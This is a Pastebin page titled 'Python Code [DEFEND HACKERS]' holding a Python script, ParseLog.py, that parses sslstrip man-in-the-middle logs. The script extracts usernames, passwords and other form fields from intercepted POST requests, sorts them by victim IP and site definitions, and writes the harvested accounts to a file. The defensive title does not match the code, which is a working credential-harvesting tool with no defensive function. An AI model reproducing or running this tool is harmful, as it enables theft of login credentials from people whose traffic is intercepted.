API tools faq
paste
surensach

Python Code [DEFEND HACKERS]

surensach
May 24th, 2012
1,704
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
raw download clone embed print report
  1. Code:
  2.  
  3. #!/usr/bin/env python
  4.  
  5. #####################
  6. # ParseLog.py
  7. #
  8. # By [email protected]
  9. #####################
  10.  
  11. """ This file parses the sslstrip.log created by
  12. sslstrip for usernames and passwords (and other
  13. interesting information) defined in the file
  14. resources/definitions.sslstrip. It will also
  15. give you a complete list of all unknown information,
  16. with the exception of anything listed in the file
  17. resources/blacklist.sslstrip.
  18. """
  19.  
  20. from urllib import unquote
  21.  
  22. getIP = lambda origin: origin[origin.find('(')+1:origin.find(')')]
  23.  
  24. blacklist = []
  25. accounts = []
  26. definitions = {}
  27.  
  28. def getDefs(defs):
  29. d = {}
  30. for definition in defs:
  31. tmp = definition.split('|')
  32. a = tmp.pop(0)
  33. b = tmp.pop()
  34. if('\n' in b):
  35. b = b[:-1]
  36. tmp.append(b)
  37. d[a] = tmp[:]
  38. return d
  39.  
  40. def getAllVars(line):
  41. while('&&' in line):
  42. line = line.replace('&&','&')
  43. vars = {}
  44. tmp = line.split('&')
  45. for var in tmp:
  46. try:
  47. (a,b) = var.split('=')
  48. if('$' in unquote(a)):
  49. a = unquote(a).split('$').pop()
  50. if('\n' in unquote(b)):
  51. b = unquote(b)[:-1]
  52. vars[unquote(a)] = unquote(b)
  53. except:
  54. pass
  55. return vars
  56.  
  57. def process(origin,line):
  58. origin = getIP(origin)
  59. if(origin not in blacklist):
  60. vars = getAllVars(line)
  61. if(origin in definitions):
  62. definition = definitions[origin][:]
  63. name = definition.pop(0)
  64. account = "(%s) " % name
  65. for variable in definition:
  66. try:
  67. v = vars[variable]
  68. except:
  69. v = 'UNDEFINED'
  70. account += "%s = %s :: " % (variable,v)
  71. if('UNDEFINED' not in account):
  72. if(account not in accounts):
  73. accounts.append(account)
  74. account += "**NEW**"
  75. print(account)
  76. else:
  77. print("Unknown:\t%s" % origin)
  78. for var in vars:
  79. if(vars[var] != ""):
  80. print("\t%s:\t%s" % (var,vars[var]))
  81. try:
  82. lines = open('sslstrip.log','r').readlines()
  83. except:
  84. lines = []
  85. try:
  86. blacklist = open('resources/blacklist.sslstrip','r').read().split('\n')
  87. except:
  88. print("--blacklist not defined--")
  89. try:
  90. accounts = open('accounts.txt','r').read().split('\n')
  91. except:
  92. pass
  93. try:
  94. definitions = getDefs(open('resources/definitions.sslstrip','r').readlines())
  95. except:
  96. pass
  97.  
  98. try:
  99. line = lines.pop(0)
  100. while(1):
  101. while('POST' not in line):
  102. try:
  103. line = lines.pop(0)
  104. except:
  105. break
  106. process(line,lines.pop(0))
  107. try:
  108. line = lines.pop(0)
  109. except:
  110. break
  111. except:
  112. print("Empty logfile.")
  113.  
  114. output = open('accounts.txt','w')
  115. accounts.sort()
  116. for account in accounts:
  117. if(account != ''):
  118. output.write(account + '\n')
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!